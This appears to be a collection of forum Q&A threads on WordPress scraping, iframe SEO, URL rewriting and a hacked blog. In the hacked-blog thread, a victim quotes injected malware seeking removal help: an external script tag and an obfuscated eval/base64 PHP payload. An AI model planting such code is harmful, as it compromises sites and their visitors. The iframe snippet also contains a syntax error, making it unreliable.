How to prevent scraping my blog's updates? - wordpress

I have a self-hosted wordpress blog, and as almost expected, I found there's another blog scraping my contents, posting a perfect copy of my own posts (texts, images not hotlinked but fetched and reupped to the clone's server, html layout within the posts) with a few hours of delay.
however I must confess I'm infuriated to see that when I search Google for keywords relevant to my posts, the scraping clone always comes first.
So, here I am, open for suggestions, would you know how to prevent my site from being successfully scraped ?
Technical precisions :
the clone blog appears to be self-hosted, and so am I, I'm on a debian+webmin+virtualmin dedi
my RSS feed is already cut with a "read more on" halfway. Hey, I just thought I should publish a post while assigning it a date like 2001-01-01, and see if it appears on the clone blog, that would allow to know if my RSS is still used as a signal for "hey, it's scraping time !"
my logs can't find the scraper among legit traffic, either it's non-identifiable or else it's lost among the flood of legit traffic
I already htaccess-banned and iptables-banned the .com domain of the clone, my contents are still cloned nonetheless
the clone website makes use of reverse proxies, so I can't trace where it is hosted and what actual IPs should be blocked (well, unless I iptables-ignore-ban half of Europe to ban the whole IP ranges of its data storage facility, but I'm slightly reluctant to that !)
I'm confident this isn't hand-made, the cloning has been running for two years now, every day without fail
only my new posts are cloned, not the rest of my website (not the sidebars, not the wordpress pages as opposed to wordpress posts, not the single pages), so setting up a jail.html to log who opens it page won't work, no honey-potting
when my posts contain internal links pointing to another page of my website, the posts on the clone won't be rewritten and will still point to my own website
I'd love help and suggestions with this issue. Not being cloned, but losing traffic to that bot while I'm the original publisher.

You can't really stop them in the end, but you might be able to find them and mess with them. Try hiding the request IP in an HTML comment, or white-on-white text, or just somewhere out of the way, then see what IPs show up on the copies. You can also try to obfuscate that text if you want by turning it into a hex string or something so it's less obvious to someone who doesn't know or make it look like an error code, just so they don't catch on to what you're doing.
In the end, though, I'm not sure how much it will buy you. If they're really inattentive, rather than shutting them down and calling attention to the fact that you're onto them, you can feed them gibberish or whatever whenever one of their IPs crops up. That might be fun and it's not too hard to make a gibberish generator by putting sample texts into a Markov chain.
EDIT: Oh, and if pages aren't rewritten too much, you might be able to add some inline JS to make them link to you, if they don't strip that. Say, a banner that only shows up if they're not at your site, giving the original link to your articles and suggesting that people read that.

Are you willing to shut down your RSS Feed? if so you could do something like
function fb_disable_feed() {
wp_die( __('No feed available,please visit our homepage!') );
}
add_action('do_feed', 'fb_disable_feed', 1);
add_action('do_feed_rdf', 'fb_disable_feed', 1);
add_action('do_feed_rss', 'fb_disable_feed', 1);
add_action('do_feed_rss2', 'fb_disable_feed', 1);
add_action('do_feed_atom', 'fb_disable_feed', 1);
it means if you go to a feed page, it just returns with the message in wp_die() on line two. We use it for 'free' versions of our WP Software with an if-statement so they can't hook into their RSS feeds to link to their main website, it's an upsell opportunity for us, it works well is my point, haha.

Even though this is a little old of a post, I thought it would still be helpful for me to weigh in in case other people see the post and have the same question. Since you've eliminated the RSS feed from the mix and youre pretty confident it isnt a manual effort, then what you need to is better stop the bots they are using.
First, I would recommend banning proxy servers in your IPTables. You can get a list of known proxy server addresses from Maxmind. This should limit their ability to anonymize themselves.
Second, it would be great to make it harder for them to scrape. You could accomplish this in one of a couple of ways. You could render part, or all of your site in javascript. If nothing else, you could at least just render the links in javascript. This will make it significantly harder for them to scrape you. Alternatively, you can put your content within an iframe inside the pages. This will also make it somewhat harder to crawl and scrape.
All this said, if they really want your content they will pretty easily get by these traps. Honestly, fighting off webscrapers is an arms race. You cannot put any static trap in place to stop them, instead you have to continuously evolve your tactics.
For full disclosure, I am a co-founder of Distil Networks, and we offer an anti-scraping solution as a service.

Related

Lost all my sharing stats by purchasing a domain

I lost all the likes on my website on Wordpress then I bought the domain. It turns out that is the same site, but now no longer use the wordpress.com but .com (http://sobreasdeliciasdavida.com/).
Despite recent, my blog already had good statistics and the loss of more than 500 shares in Facebook brings my blog back to its beginning.
Can you offer the option of importing the likes to the new domain since the posts are the same?
Is there any way to do this?
Oftentimes when you move a well-established site, you'll want to set up a 301 redirect from the previous site. It's a permanent redirect that ensures that people following links to your previous site end up at your new one. I should point out, though, that your blog is far from taken back to its beginning. Remember, content is king, and you now have a site that's totally under your control and is already packed with great content, content that you know people respond to, like in social media venues, comment on, etc., etc. Don't worry about the 500 you might not get back because you certainly have thousands more on the way if you just keep doing what you're doing.
If you are directly using the facebook code in your website, then you can check this out. http://searchenginewatch.com/sew/how-to/2172926/maintain-social-shares-site-migration

Retrieving relevant posts from Wordpress blogs

I have a requirement to write a program in Java to retrieve all the posts from all the wordpress sites containing a keyword(s).
This is how I approached the problem. I initially thought I would crawl the wordpress sites looking for the keywords I am interested in. But I realized if there is an endpoint for wordpress search, it makes my job a lot easier. So I have looked around to see if there is any search endpoint to submit queries and get the links for the posts.
All I found is just http://wwww.en.search.wordpress.com. I can still tweak the url and get some links. But
I like to know if there is any better way to handle this problem
The search link I posted is for the users and it might be limiting my search results since I query it through a program
Also I like to retrieve posts from the given date range. I am not sure if this is possible with my approach.
Appreciate any help in this regard. Thank you.
How about this approach:
Assuming you don't need to go back to the history and scrap all the data I would just stick to tags
http://en.wordpress.com/tags/
I would crawl it every day get the most popular tags (by font size) then on each tag get the articles published in the past 24 hours
On each post get all the comments and search for your keywords
Would that work? if not please share more details
Good luck

Web crawlers and IFrames

Hypothetical Situation: I have a small obscure website called "miniatureBoltsInCarburetors.com" which provides content about the miniature bolts which hold a carburetor together as well as some general related automotive information. My site also has a single page which allows someone to find the missing bolt in their carburetor, and while no one will access this page directly from my website, one billion other popular automotive sites have embedded this single page in their website using an iframe, yet not included a link back to my site.
I recognize that this question is related to SEO which is considered off topic, however, all of the many SEO related forums discuss the marketing steps one could take, and not the programming steps or strategies, and hope others will allow this question to be answered here.
I wish my site "miniatureBoltsInCarburetors.com" to be ranked high for general automotive searches. What could I do to allow the 3rd party sites which include an iframe back to my site to improve my ranking? Could using JavaScript in the iframe to create a link on the parent page provide any value? What about when my server renders the page, use PHP to get the referring URL from $_SERVER, and include it in the content?
I am providing a solution here. Not sure if this is what you want though.
In your page which is used by other websites in iframe you can put below Javascript. This javascript checks if the webpage is opened inside an iframe or directly in browser.
So using this check when you see it is opened in an iframe. On click on something navigate to your website.
// This works in all browsers
function inIframe () {
try {
return window.self !== window.top;
} catch () {
return true;
}
}
Also for your reference you can check the below URL.
How to prevent my site page to be loaded via 3rd party site frame of iFrame
Hope it helps.
Iframes are seen seperate pages by Google. Your approach may end up being penalized due to being sourced from untrusted site. According to Google Webmaster Support
Frames can cause problems for search engines because they don't
correspond to the conceptual model of the web. Google tries to
associate framed content with the page containing the frames, but we
don't guarantee that we will.
One of the best approaches to rank higher for a specific keyword is, make multiple related sites. In your case a 3-4 paged site about carburetors, bolts, other things your primary site contain would do it. These mini sites will be more intense about the subject due to less page count. Of course they should contain unique articles on each page. Then link from mini websites to primary websites and you can see the dramatic change.
In fact, the thing you are trying to do was a tactic to rank competitors down worked occasionally a few years ago. Now, it is still a risk.
I see. You don't want to mess up the page for your own site, but you want to do something with all the uncredited embeddings.
The solution is fairly simple:
Create a copy of the page.
Switch your site to use the copy.
Amend the version that countless other sites are embedding, so that there is a small link back to you. Or, add an iframe blocker script that will load your site.
If the page is active (ie user interacts with it to find the missing bolt) you could include a sales message with the response encouraging the user to visit your site.
I think that your goal is getting your link onto these other sites long enough to get indexed by Google before it is noticed by the people doing the embedding, so it's a bit of a balancing act.
I see conflicting advice about how Google indexes iframes. You should use a PageRank checker to see if the existing iframe page url has PageRank, and compare it to the page that you embed it on.
I dont Think you need to worry ,.
Google bot does seem to crawl through Iframes ,but the Web-Page Containing that Iframe is not Credited for that Content .. In other Words,, Page-Ranking of that particular Web-Page do not Change due to Contents from Iframe .
is IFrame crawled by Google?
Do robots crawl iframes?

A link to a linkstoads.net in my wordpress blog, probably a virus. How do i get rid of it?

Recently (last 2 weeks) this line of code appeared in the footer of a wordpress blog :
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put that here. I have no idea about what it does ; but I want it out.
For my first try, I just replaced the template and it was gone for a few minutes. But it came back.
So i got to my index.php file (not the template, the very first index.php) and found that code :
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible ? I'm a newbie about viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't haven't updated your software in quite some time and multiple hackers have exploited some well known vulnerability in your software.
How do you fix it? Scorched earth... You have been hacked by many bots, and probably sold online like some kind of whore. Delete your entire web root and start from scratch. Make sure you have the latest versions of every plugin and Wordpress.
For the record Wordpress was written by monkeys or children or children monkeys... Regardless it is by far one of the worst application I have ever hacked. They are probably still using your password hash as the session id, which means they don't even understand the basics of why you should hash passwords.
Oah if you keep getting hacked, higher a professional.
Problem solved, wordpress is not responsible for it.
There's a trojan that infect filezilla and when you open it, it'll inject code in every pages it can reach via filezilla.
This is really a big deal and 3 antiviruses could not even find it.
If you see that, format your computer.

Using nginx rewrite to hide or clean URLs?

Greetings.
I've been trying to grok regexes and rewrites but i'm a newbie at it. I have a simple site, one dir only, all i want is to rewrite domain.com/file.php?var=value to domain.com, making sure the user will only see domain.com in the adress bar throughout site navigation (even if i start making the site more complex).
Simply speaking it's freezing the url, although if the site grow's i'd rather make some "clean url" approach but i'm still at basic php and i sense i'd have to rtfm on http/1.1
You can use nginx rewrite rule like this:
rewrite ^([^.]*)$ /index.php
to send all requests that do not contain a "." to your index.php script. In your php script, explode the request url to get the passed parameters, and then call the php page you want to:
#URL /people/jack_wilson
$url_vars = explode('/',$_SERVER['request_uri']); # array('','people','jack_wilson');
$page = $url_vars[1];
if($page == 'people'){
$username = $url_vars[2];
require('people.php'); #handle things from here.
}
Typically this type of "clean" URL stuff is typically accomplished with a wrapper frame for the entire site. The browser shows the URL of that frame only, and the contents can be whatever.
But I actually don't recommend it, because the user may want to bookmark the "dirty" URL.
This type of URL obfuscation diminishes usability for advanced users.
Not to be a jerk, but I typically only see this type of URL obfuscation on "artsy" sites that care more about what their address bar looks like than usability of their site. Making your users happy via enhanced usability is a better long term approach IMHO.
I guess freezing the url is driven by marketing desires, so here's the downside to that, from marketing standpoint as well: your users won't be able to send a link to a page they liked to their friends via IM, email or facebook, so it actually decreases the appeal of your site even for the most clueless users.
I don't (knowledgeably) think it's safe to have php variables showing around in the adress bar (although they'd show in the status bar of some browsers anyway...). Idealy the user wouldn't know what is the site using behind the scenes - i'm configuring error pages for starters. And yes, for aesthetics as well. If i can rewrite to domain.com/foo/bar i'd be happy; assuming nginx would handle the "translation back to ugly URLs" if it got such a request, which i think it does with location-directives. But having domain.com/file.php?var1=value&var2=value kinda annoys me, makes me feel i'm exposing the site too much.
Frames are not recomended (especially 'cos of search engines) and i'm trying to stick to xhtml 1.1 Strict (so far so good). If the content is well designed, easy to navigate, acessible regardless of browser-choice, intuitive, etc... i guess i could live with cute URLs :)
I'd gladly grok through any rtfm material regarding good webdesign techniques, php, http/1.1 and whatever made you go "Yeah! that's what i've been looking for!" at 4am.
Thanks :)
[if i understand this site right, this oughta be a reply to the original post, not to an answer... sorry]
You could also look into a PHP framework such as Code Igniter that will handle all the PHP side of this for you.
http://codeigniter.com/

Resources